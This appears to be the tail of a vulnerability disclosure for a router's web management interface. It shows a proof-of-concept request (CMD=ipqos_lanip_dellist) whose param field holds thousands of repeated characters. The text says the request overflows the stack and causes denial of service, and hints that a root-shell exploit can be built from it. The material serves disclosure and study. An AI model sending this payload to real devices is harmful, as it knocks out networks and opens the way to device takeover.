CMD=ipqos\_lanip\_dellist&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/shyFM5N.png) And you can write your own exp to get the root shell.

Tag

#webkit